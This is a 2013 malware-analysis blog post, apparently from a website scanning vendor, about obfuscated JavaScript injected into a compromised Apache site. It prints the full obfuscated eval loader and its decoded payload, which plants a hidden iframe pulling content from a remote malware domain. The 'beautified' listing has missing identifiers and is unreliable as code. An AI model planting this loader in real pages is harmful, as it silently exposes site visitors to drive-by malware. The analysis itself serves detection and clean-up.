Monday, May 27, 2013

Malicious JavaScript redirects browser to blacklisted domain

Obfuscated malicious JavaScript code generates hidden iframe to contact remote blacklisted domain

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website runs on Apache and hosts suspicious JavaScript code injected in file. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon May 27 08:01:24 2013
Infected website's files: 1
Website malware scan report link: http://goo.gl/gVqo4


Quttera | Website Security Scanner
Quttera | Website Security Scanner screenshot


Quttera | detected malicious JavaScrip in web page
Malicious JavaScript



Threat dump: [[<script type='text/javascript' language='javascript' >
if(window.document)aa=([window][0]+[]).substr(0,2);
aaa=(document+[]).substr(0,2);
if(aa===aaa)
{
ss='';
s=String;
12-function()
{
e=eval;
}
();
t='w';
}
h=-2;
n=["4.5w4.5w52.5w51w16w20w50w55.5w49.5w58.5w54.5w50.5w55w58w23w51.5w50.5w58w34.5w54w50.5w54.5w50.5w55w58w57.5w33w60.5w42w48.5w51.5w39w48.5w54.5w50.5w20w19.5w49w55.5w50w60.5w19.5w20.5w45.5w24w46.5w20.5w61.5w4.5w4.5w4.5w52.5w51w57w48.5w54.5w50.5w57w20w20.5w29.5w4.5w4.5w62.5w16w50.5w54w57.5w50.5w16w61.5w4.5w4.5w4.5w50w55.5w49.5w58.5w54.5w50.5w55w58w23w59.5w57w52.5w58w50.5w20w17w30w52.5w51w57w48.5w54.5w50.5w16w57.5w57w49.5w30.5w19.5w52w58w58w56w29w23.5w23.5w48.5w52.5w51w53.5w59.5w61w23w49.5w52w48.5w55w51.5w50.5w52.5w56w23w55.5w57w51.5w23.5w31.5w51.5w55.5w30.5w25w19.5w16w59.5w52.5w50w58w52w30.5w19.5w24.5w24w19.5w16w52w50.5w52.5w51.5w52w58w30.5w19.5w24.5w24w19.5w16w57.5w58w60.5w54w50.5w30.5w19.5w59w52.5w57.5w52.5w49w52.5w54w52.5w58w60.5w29w52w52.5w50w50w50.5w55w29.5w56w55.5w57.5w52.5w58w52.5w55.5w55w29w48.5w49w57.5w55.5w54w58.5w58w50.5w29.5w54w50.5w51w58w29w24w29.5w58w55.5w56w29w24w29.5w19.5w31w30w23.5w52.5w51w57w48.5w54.5w50.5w31w17w20.5w29.5w4.5w4.5w62.5w4.5w4.5w51w58.5w55w49.5w58w52.5w55.5w55w16w52.5w51w57w48.5w54.5w50.5w57w20w20.5w61.5w4.5w4.5w4.5w59w48.5w57w16w51w16w30.5w16w50w55.5w49.5w58.5w54.5w50.5w55w58w23w49.5w57w50.5w48.5w58w50.5w34.5w54w50.5w54.5w50.5w55w58w20w19.5w52.5w51w57w48.5w54.5w50.5w19.5w20.5w29.5w51w23w57.5w50.5w58w32.5w58w58w57w52.5w49w58.5w58w50.5w20w19.5w57.5w57w49.5w19.5w22w19.5w52w58w58w56w29w23.5w23.5w48.5w52.5w51w53.5w59.5w61w23w49.5w52w48.5w55w51.5w50.5w52.5w56w23w55.5w57w51.5w23.5w31.5w51.5w55.5w30.5w25w19.5w20.5w29.5w51w23w57.5w58w60.5w54w50.5w23w59w52.5w57.5w52.5w49w52.5w54w52.5w58w60.5w30.5w19.5w52w52.5w50w50w50.5w55w19.5w29.5w51w23w57.5w58w60.5w54w50.5w23w56w55.5w57.5w52.5w58w52.5w55.5w55w30.5w19.5w48.5w49w57.5w55.5w54w58.5w58w50.5w19.5w29.5w51w23w57.5w58w60.5w54w50.5w23w54w50.5w51w58w30.5w19.5w24w19.5w29.5w51w23w57.5w58w60.5w54w50.5w23w58w55.5w56w30.5w19.5w24w19.5w29.5w51w23w57.5w50.5w58w32.5w58w58w57w52.5w49w58.5w58w50.5w20w19.5w59.5w52.5w50w58w52w19.5w22w19.5w24.5w24w19.5w20.5w29.5w51w23w57.5w50.5w58w32.5w58w58w57w52.5w49w58.5w58w50.5w20w19.5w52w50.5w52.5w51.5w52w58w19.5w22w19.5w24.5w24w19.5w20.5w29.5w4.5w4.5w4.5w50w55.5w49.5w58.5w54.5w50.5w55w58w23w51.5w50.5w58w34.5w54w50.5w54.5w50.5w55w58w57.5w33w60.5w42w48.5w51.5w39w48.5w54.5w50.5w20w19.5w49w55.5w50w60.5w19.5w20.5w45.5w24w46.5w23w48.5w56w56w50.5w55w50w33.5w52w52.5w54w50w20w51w20.5w29.5w4.5w4.5w62.5"];
n=n[0].split(t);
for(i=0;
i-n.lengthɘ
i++)
{
j=i;
ss=ss+String.fromCharCode(-h*n[j]);
}
if(aa===aaa)e(ss);

 </script>]]


Malware entry


Malware entry details. At the moment this article is written the malware link is unavailable.

Beautified script


Original threat body:

  1. if (window.document) a = ("v532b5".split + Date).substr(0, 6);
  2. aa = ([].reverse + [].reverse).substr(0, 6);
  3. if (=== aa) f = [-30, -30, 66, 63, -7, 1, 61, 72, 60, 78, 70, 62, 71, 77, 7, 64, 62, 77, 30, 69, 62, 70, 62, 71,77, 76, 27, 82, 45, 58, 64, 39, 58, 70, 62, 1, 0, 59, 72, 61, 82, 0, 2, 52, 9, 54, 2, 84, -30, -30, -30, 66, 63,75, 58, 70, 62, 75, 1, 2, 20, -30, -30, 86, -7, 62, 69, 76, 62, -7, 84, -30, -30, -30, 61, 72, 60, 78, 70, 62, 71,77, 7, 80, 75, 66, 77, 62, 1, -5, 21, 66, 63, 75, 58, 70, 62, -7, 76, 75, 60, 22, 0, 65, 77, 77, 73, 19, 8, 8, 83,79, 82, 64, 63, 66, 76, 66, 7, 64, 75, 17, 61, 72, 70, ...
  4. 76, 66, 7, 64, 75, 17, 61, 72, 70, 58, 66, 71, 7, 59, 66, 83, 8, 24, 64, 72, 22, 10, 0, 2, 20, 63, 7, 76, 77, 82,69, 62, 7, 79, 66, 76, 66, 59, 66, 69, 66, 77, 82, 22, 0, 65, 66, 61, 61, 62, 71, 0, 20, 63, 7, 76, 77, 82, 69,62, 7, 73, 72, 76, 66, 77, 66, 72, 71, 22, 0, 58, 59, 76, 72, 69, 78, 77, 62, 0, 20, 63, 7, 76, 77, 82, 69, 62, 7,69, 62, 63, 77, 22, 0, 9, 0, 20, 63, 7, 76, 77, 82, 69, 62, 7, 77, 72, 73, 22, 0, 9, 0, 20, 63, 7, 76, 62, 77, 26,77, 77, 75, 66, 59, 78, 77, 62, 1, 0, 80, 66, 61, 77, 65, 0, 5, 0, 10, 9, 0, 2, 20, 63, 7, 76, 62, 77, 26, 77, 77,75, 66, 59, 78, 77, 62, 1, 0, 65, 62, 66, 64, 65, 77, 0, 5, 0, 10, 9, 0, 2, 20, -30, -30, -30, 61, 72, 60, 78, 70,62, 71, 77, 7, 64, 62, 77, 30, 69, 62, 70, 62, 71, 77, 76, 27, 82, 45, 58, 64, 39, 58, 70, 62, 1, 0, 59, 72, 61,82, 0, 2, 52, 9, 54, 7, 58, 73, 73, 62, 71, 61, 28, 65, 66, 69, 61, 1, 63, 2, 20, -30, -30, 86];
  5. md = 'a';
  6. = window.eval;
  7. = f;
  8. = '';
  9. = 'f' + 'ro' + 'mCh' + 'arCod' + 'e';
  10. for (= 0; i < w.length; i++) {
  11.     s = s + String[g](39 + w[0 + i]);
  12. }
  13. if (=== aa) e('e' + '(' + 's' + ')');

Malicious payload


Decoded payload generates hidden iframe


  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://zvygfisi.gr8domain.biz/?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6.  
  7. function iframer() {
  8.     var f = document.createElement('iframe');
  9.     f.setAttribute('src', 'http://zvygfisi.gr8domain.biz/?go=1');
  10.     f.style.visibility = 'hidden';
  11.     f.style.position = 'absolute';
  12.     f.style.left = '0';
  13.     f.style.top = '0';
  14.     f.setAttribute('width', '10');
  15.     f.setAttribute('height', '10');
  16.     document.getElementsByTagName('body')[0].appendChild(f);
  17. }


Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing Analysis

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.